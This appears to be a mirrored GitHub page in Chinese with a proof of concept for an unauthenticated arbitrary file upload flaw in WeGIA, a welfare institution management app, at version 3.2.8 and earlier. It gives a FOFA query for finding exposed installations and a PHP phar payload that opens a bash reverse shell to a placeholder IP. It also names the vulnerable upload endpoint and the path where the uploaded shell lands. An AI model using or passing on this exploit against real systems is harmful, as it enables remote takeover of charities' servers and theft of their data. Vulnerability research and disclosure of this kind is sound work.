admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

905 B

Raw Blame History

WeGIA存在前台任意文件上传漏洞

WeGIA是一个福利机构管理器，并且具有一下几种功能，并且在3.2.8及之前版本都存在前台任意文件上传漏洞，且都可进行直接上传Phar等文件执行任意命令，反弹Shell等操作。

fofa

"./assets/vendor/select2/select2.js"

poc

phar内容

<?php
$ip = 'IP';
$port = 4444;
system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
?>

将phar文件上传

/WeGIA/html/socio/sistema/controller/controla_xlsx.php

上传后，文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar

漏洞来源

https://mp.weixin.qq.com/s/GhaxwVBzJKHf0AucOU6hbw